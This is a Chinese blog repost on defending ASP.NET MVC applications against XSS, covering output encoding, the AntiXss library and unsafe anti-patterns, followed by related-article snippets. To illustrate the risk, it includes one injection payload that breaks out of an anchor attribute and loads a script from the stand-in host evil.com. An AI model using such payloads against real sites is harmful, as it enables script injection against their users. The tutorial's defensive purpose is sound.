MVC WEB安全——XSS攻击防御

最新推荐文章于 2022-12-29 08:51:58 发布
最新推荐文章于 2022-12-29 08:51:58 发布
阅读量95 收藏
点赞数
文章标签: 测试 web安全 数据库
原文链接:http://www.cnblogs.com/pengzhen/p/3801140.html
版权

 

XSS(跨站脚本攻击)

描述:

原理:攻击者往Web页面里插入恶意代码,当用户浏览该页之时,嵌入其中Web里面的代码会被执行,从而达到攻击用户的特殊目的。

类别

1)被动注入(Passive Injection)。用户将恶意代码输入到表单中,保存到数据库,然后再显示在网站上;

2)主动注入(Active Injection)。用户将恶意代码输入到文本框中并将输入的内容立刻在屏幕上显示出来。

XSS攻击在Web上排名第一,遗憾的是,导致XSS猖獗的原因是Web开发人员不熟悉这种攻击(好遗憾哦。。。)。

避免:

1)对所有内容都进行HTML编码;

      Razor引擎默认对输出内容进行HTML编码。如:@Model.FirstName。

      如果非Razor引擎,则如: 

<% Html.Encode(Model.FirstName) %>

2)使用Html.AttributeEncode和Url.Encode;

       

<a href=”<%= Url.Action(“Index”,"home”,new { name = ViewData[“name”]})%>">点击我</a>

       将name改为:

"></a><script src = “http://abcd.evil.com”></script><a href= "
    则攻击成功。 

      编码1: 

<a href=”<%= Url.Action(“Index”,”home”,new { name = Html.AttributeEncode(ViewData[“name”])})%>”>点击我</a>

      编码2: 

<a href=”<%= Url.Encode(Url.Action(“Index”,”home”,new { name = ViewData[“name”] }))%>”>点击我</a>

3)对Ajax.JavaScriptStringEncode进行JavaScript编码。

      如 

var searchItem = “@Html.Raw(Ajax. JavaScriptStringEncode(Model))”;

4)将AntiXss库作为ASP.NET的默认编码器。

反模式:

1)使用 

Html.Raw(Model.ReturnUrl)
绕过编码;

2)使用 

[AllowHtml]
对模型的属性禁用请求验证;

3)使用 

[ValidateInput(false)]
对Controller或者Action禁用请求验证。

转载于:https://www.cnblogs.com/pengzhen/p/3801140.html

weixin_30237719
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ASP.NET MVC Anti-XSS方案
weixin_34327223的博客
12-31 260
1:Form提交模式 在使用Form提交时,MVC框架提供了一个默认的机制。如果数据中含有恶意字,则会自动转向出错页面。 2:Ajax+JSON提交模式。 MVC框架未提供对于Json数据的AntiXSS支持,所以必须自行实现。 Step1:定义一个Attribute[AllowHtml],如果有这个标记,则说明该属性允许Html,不需要验证。 /// &lt...
ASP.NET MVC中防止XXS跳转
SuperLinmeng的博客
12-04 1797
public ActionResult Login(LogOnModel model, string returnUrl) { if (ModelState.IsValid) { RegisteredUser usr = RegisteredUserBLL.AuthenticateUse
xss漏洞攻击,Filter实现xss漏洞
化名三爷
07-18 1913
该文章主要使用Filter针对Xss攻击,sql注入,服务器访问白名单,以及csrf进行安全校验 1,主要实现的是三大块功能:Xss攻击,sql注入,服务器白名单,以及csrf 2,此Filter为真实项目部署,在XssHttpServletRequestWrapper.java文件中的cleanSqlKeyWords方法为具体的Xss拦截逻辑,可根根据自己的需要进行完善 3,服务器白名单为单独的一个工具包,在文章最后给出 4,文章开发环境为JDK1.8,使用SpringBoot框架进行开发 5,
MVC Anti-XSS方案
mituan1234567的专栏
06-11 484
http://blog.csdn.net/cassaba/article/details/21094011 XSS攻击是用户提交到服务器的数据包含恶意JavaScript脚本,如果这种数据在存储或显示的时候不加处理,那么其它用户访问页面的时候,这些脚本可能被执行,轻则导致页面无法正常使用,重则导致重要信息泄露。     开发Web应用程序,需要从全局考虑这个问题,采取一致的处理方式,在
.net mvc 防止 xss 与 CSRF
weixin_30741653的博客
05-31 95
CSRF(Cross-site request forgery跨站请求伪造,也被称成为“one click attack”或者session riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS),但它与XSS非常不同,并且攻击方式几乎相左。XSS利用站点内的信任用户,而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。与XSS攻击相比,CSR...
SpringBoot +esapi 实现防止xss攻击 实战代码,满满干货
06-08
SpringBoot是一个流行的Java微服务框架,而ESAPI(Enterprise Security API)则是一个开源的安全库,旨在提供一种简便的方式来防御多种Web应用安全问题,包括XSS攻击。本实战代码将展示如何结合SpringBoot和ESAPI来...
基于Linux的Web程序设计——PHP网站开发.rar
05-31
8. **安全性**:包括SQL注入防御、XSS防护、CSRF预防等Web安全最佳实践。 9. **会话管理**:如何使用PHP的session机制来跟踪用户状态。 10. **模板引擎**:可能使用了某种模板引擎,如Smarty,来分离视图和逻辑。 ...
tongxunlu.zip_WEB开发_PHP_
08-11
9. **安全实践**: 包括SQL注入防护、XSS攻击防御和CSRF防范,这些都是Web开发中的重要安全措施。 10. **版本控制**: 学习使用Git进行版本控制,可以帮助管理和协作项目,对初学者来说是良好的工作习惯。 总的来说...
XSS转码 && struts2 property标签的bug
03-21
XSS(Cross-site scripting)是Web应用中的常见安全漏洞,而Struts2是Java开发中的流行MVC框架。这个问题涉及到XSS攻击的防范手段——转码,以及Struts2框架中property标签的潜在漏洞。 首先,我们来深入理解XSS...
《开发安全可靠的ASP.NET 3.5应用程序——涵盖C#和VB.NET》源代码.rar
06-20
这可能涉及到身份验证(如Forms Authentication)、授权、输入验证、SQL注入防护、跨站脚本(XSS)防御以及对加密和解密的使用等。 5. 数据访问:ASP.NET 3.5提供了ADO.NET Entity Framework,这是一个ORM(对象关系...
浅谈ASP.NET MVC 防止跨站请求伪造(CSRF)攻击的实现方法
10-18
下面小编就为大家分享一篇浅谈ASP.NET MVC 防止跨站请求伪造(CSRF)攻击的实现方法,具有很好的参考价值,希望对大家有所帮助。一起跟随小编过来看看吧
SpringBoot只需要几行代码,就可以防XSS攻击
passerbyYSQ
02-23 1048
前言 可能很多同学在学习过程中自己做项目,很容易忽略XSS攻击。网上不少博客的自定义全局拦截器来实现XSS过滤,其实不需要这么麻烦,SpringBoot留有不少钩子(扩展点),据此我们可以巧妙地实现全局的XSS过滤。 防止XSS攻击,一般有两种做法: 1、转义 Spring有提供工具类HtmlUtils来实现转义。个人比较喜欢这种方式,所以下面代码均采用转义处理。 2、过滤敏感标签(将敏感标签去除) jsoup实现了非常强大的clean敏感标签的功能,但是我对jsoup了解并不多。 接下来的
SpringBoot防Xss攻击
最新发布
leveretz的博客
12-29 527
SpringBoot防Xss攻击
Web安全系列(一):XSS 攻击基础及原理
weixin_34288121的博客
09-11 138
跨站脚本攻击(XSS)是客户端脚本安全的头号大敌。本文章深入探讨 XSS 攻击原理,下一章(XSS 攻击进阶)将深入讨论 XSS 进阶攻击方式。 本系列将持续更新。 XSS 简介 XSS(Cross Site Script),全称跨站脚本攻击,为了与 CSS(Cascading Style Sheet) 有所区别,所以在安全领域称为 XSS。 XSS 攻击,通常指黑客通过 HTML 注入 篡改网页...
【SpringBoot】使用WebMvcConfigurer配置SpringMVC
墩墩分墩
12-05 2963
WebMvcConfigurer配置类是使用Java代码代替传统的xml配置文件,对SpirngMvc进行配置的一种方式,需要创建一个`配置类@Configuration`并`实现WebMvcConfigurer 接口` - 在Spring Boot 1.5版本以前都是继承WebMvcConfigurerAdapter类来实现代码配置的。 - SpringBoot 2.0 后,WebMvcConfigurerAdapter类被`@Deprecated(弃用)`。 - **官方推荐**使用`实现WebMv
Web安全问题:Xss攻击及解决方法
weixin_45650737的博客
04-23 446
转自:https://blog.csdn.net/qq_38892496/article/details/91582868 作者:y_mk 什么是Xss攻击? 首先,这个词实际上是CSS(Cross Site Scripting),但它与CSS同名。所以名字是XSS。 ——摘自百度百科 https://baijiahao.baidu.com/sid=1618267672561552800&wfr=spider&for=pc 其实就是使用Javascript脚本
XSS攻击
nsxqf的博客
09-29 959
1.定义 XSS又叫CSS  (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的,比如关不完的网站、盗取用户的 cookie 信息从而伪装成用户去操作。 它与SQL注入攻击类似,SQL注入攻击中以SQL语句作为用户输入,从而达到查询/修改/删除数据...
asp.net mvc api如何过滤xss攻击
yunwu009的专栏
05-25 1098
这里我引用网络上的一些代码,然后我也进行了一些调整,以前在网络上搜到的只支持html字符串类型的过滤,不支持json格式的过滤,代码如下,我就不一一描述了,其实很简单,如果有什么不懂的,可以微信群加入提出讨论 public class XssActionInvoker : ApiControllerActionInvoker { private static readonly ILogger _log = LoggerFactory.Logger; public
预防XSS攻击,(参数/响应值)特殊字符过滤
weixin_34200628的博客
12-17 1537
一、什么是XSS攻击 XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。攻击者利用XSS漏洞旁路掉访问控制——例如同源策略(same origin policy)。这种类型的漏洞由于被黑客用来编写危害性更大的网络钓鱼(Phi...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值